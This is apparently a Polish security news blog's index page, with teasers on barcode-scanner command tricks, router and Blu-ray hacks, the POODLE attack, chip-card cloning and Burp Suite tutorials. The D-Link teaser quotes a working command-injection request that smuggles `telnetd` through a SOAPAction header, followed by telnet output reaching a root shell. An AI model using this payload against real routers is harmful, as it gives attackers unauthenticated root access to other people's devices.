Chińczyk potrafi – czyli krótki, ale treściwy wpis na chińskim blogu, pokazujący różne nietypowe techniki działające na skanery kodów kreskowych. Uruchomienie sekwencji CTRL+o na czytniku? Nie ma problemu. CTRL+r cmd – też prościzna ;-) Można powiedzieć nawet – RCE w kieszeni – w postaci kilku kodów do skanowania. –ms
Czytaj dalej »
Dwójka cyber-oficerów w US Army, ogłosiła projekt programu bug bounty – jeśli całość uda się oficjalnie zatwierdzić, to przy pewnych rozsądnych założeniach będzie można zupełnie legalnie zgłaszać błędy bezpieczeństwa w systemach wojskowych USA.
Czytaj dalej »
Co chcieliby hakować zwykli internauci? Google zna odpowiedź — spójrzmy.
Czytaj dalej »
Jeśli chcecie w legalny i darmowy sposób sprawdzić i poćwiczyć umiejętności hakowania/pentestowania to laboratoryjna infrastruktura fikcyjnej firmy SecureSoft LLC może być do tego dobrym miejscem.
Czytaj dalej »
Jakiś czas temu wspominaliśmy o trochę egzotycznej grze TIS-100, a teraz na Steamie dostępna jest kolejna gra hackerska – Hacknet. Jak na razie opinie na Steamie są “Przytłaczająco pozytywne (613)”. Przykłady: It’s the closest thing to a real life hacking sim I’ve ever seen Probably the coolest game I’ll…
Czytaj dalej »
„Computer Chronicles” to amerykański program telewizyjny nadawany w latach 1983 – 2002 przez telewizję publiczną PBS. Dziś przypomnimy sobie, na jakim poziomie stały niegdyś produkcje telewizyjne i w jaki sposób wiele lat temu spostrzegano zagadnienia związane z bezpieczeństwem komputerowym. Wnioski mogą być bardzo interesujące, a przy okazji pewnie niejednemu starszemu czytelnikowi zakręci…
Czytaj dalej »
FBI zaktualizowało niedawno swą listę najbardziej poszukiwanych przestępców związanych z przestępczością elektroniczną. Za informacje pozwalające na ujęcie podejrzanych z pierwszych miejsc można otrzymać wielomilionowe nagrody.
Czytaj dalej »
Niedawno pisaliśmy o nowych D-Linkach, a teraz pojawiło się ciekawe badanie pokazujące w jaki sposób zrealizować nieuwierzytelniony dostęp na root-a. Wystarczy jeden prosty request HTTP… wget –header=’SOAPAction: “http://purenetworks.com/HNAP1/GetDeviceSettings/`telnetd`”‘ http://192.168.0.1/HNAP1 $ telnet 192.168.0.1 Trying 192.168.0.1… Connected to 192.168.0.1. Escape character is ‘^]’. BusyBox v1.14.1 (2015-02-11 17:15:51 CST) built-in shell (msh) Enter…
Czytaj dalej »
Niskokosztowa, programowalna karta chipowa działająca w technologiach NFC / RFID. Idealna do pentestów tego typu systemów.
Czytaj dalej »
Stephen Tomkinson z NCC Group PLC zaprezentował sposoby hakowania odtwarzaczy Blu-ray za pomocą specjalnie przygotowanych dysków optycznych. Dzięki ominięciu mechanizmów zabezpieczeń wykazał możliwość uruchomienia poleceń systemowych.
Czytaj dalej »
Od kilku godzin świat obiega informacja o szczegółach nowego ataku na protokół SSLv3, którego ochrzczono akronimem “POODLE“. Bezpieczeństwo transmisji danych w 2014 roku po raz kolejny dostało siarczysty policzek.
Czytaj dalej »
Wykrywanie podatności w aplikacjach internetowych z reguły polega na enumeracji tzw. punktów wejścia, manipulowaniu żądaniami HTTP oraz analizie odpowiedzi. Skuteczność takiego przepływu pracy można zwiększyć dzięki Burp Proxy. Zobaczmy, jak z jego pomocą wykonywać podstawowe testy bezpieczeństwa web aplikacji.
Czytaj dalej »
Pośrednik HTTP analizujący ruch między przeglądarką a serwerami WWW jest podstawowym narzędziem pracy testera web aplikacji. Burp Suite – popularne akcesorium bezpieczeństwa skonstruowane wokół funkcji lokalnego proxy – jest narzędziem, koło którego żaden inżynier bezpieczeństwa nie może przejść obojętnie.
Czytaj dalej »
Badacze z uniwersytetu Cambridge opublikowali pracę pokazującą z dość dużą dokładnością jak wykonać transakcję finansową (np. wypłata z bankomatu) sklonowaną kartą chipową. Klonowanie zostało tutaj zdefiniowane jako wykonanie operacji nierozróżnialnej po stronie banku (np. na podstawie logów) z operacją wykonaną kartą oryginalną.
Czytaj dalej »
Chcielibyście zagrać czasem w pracy i przy okazji czegoś ciekawego się nauczyć? Nie macie pomysłu na rozkręcenie imprezy? Polecam zatem przyjrzeć się oryginalnej grze: Control-Alt-Hack.
Czytaj dalej »